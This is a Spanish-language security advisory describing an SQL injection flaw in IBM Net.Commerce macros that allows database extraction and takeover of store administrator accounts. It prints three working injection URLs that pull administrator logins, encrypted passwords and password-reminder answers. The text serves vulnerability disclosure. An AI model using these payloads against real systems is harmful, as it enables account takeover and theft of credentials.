IBM Net.Commerce es una popular plataforma de comercio electrónico del
gigante azul. Pero existe un problema por el cual no se validan de forma
adecuada las peticiones que se realizan de forma que es posible llegar a
extraer cualquier información de su base de datos.
El conocido paquete de IBM incluye un soporte para macros, pero estas no
realizan una verificación de los comandos introducidos por el usuario.
De tal forma, mediante la creación de peticiones http especialmente
construidas es posible conseguir cualquier información contenida en la
base de datos de NetCommerce.
Incluso, mediante la combinación de esta vulnerabilidad con otras
funcionalidades incluidas en la plataforma de comercio electrónico, como
por ejemplo restaurar la password (PasswordReset) es posible llegar a
tomar el control de las cuentas de administración de la tienda. Una vez
que el atacante consigue los permisos de nc-administrator podrá hacer
uso de todas las herramientas de administración.
Por ejemplo, el atacante podrá construir peticiones como la siguiente
para conseguir las cuentas de administración:
http://servidor.afectado/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+’A’;
Para obtener las passwords cifradas:
http://servidor.afectado/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+’ncadmin’;
Para obtener los recordatorios de passwords, se puede emplear la
siguiente URL:
http://servidor.afectado/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+’ncadmin’;
Estos son simples ejemplos que demuestran la gravedad del problema, ya
que orderdspc.d2w no es la única macro afectada y vulnerable.
antonior@hispasec.com
Más información:
Bugtraq:
http://www.securityfocus.com/archive/1/160554
Securityfocus:
http://www.securityfocus.com/vdb/bottom.html?vid=2350
Deja un comentario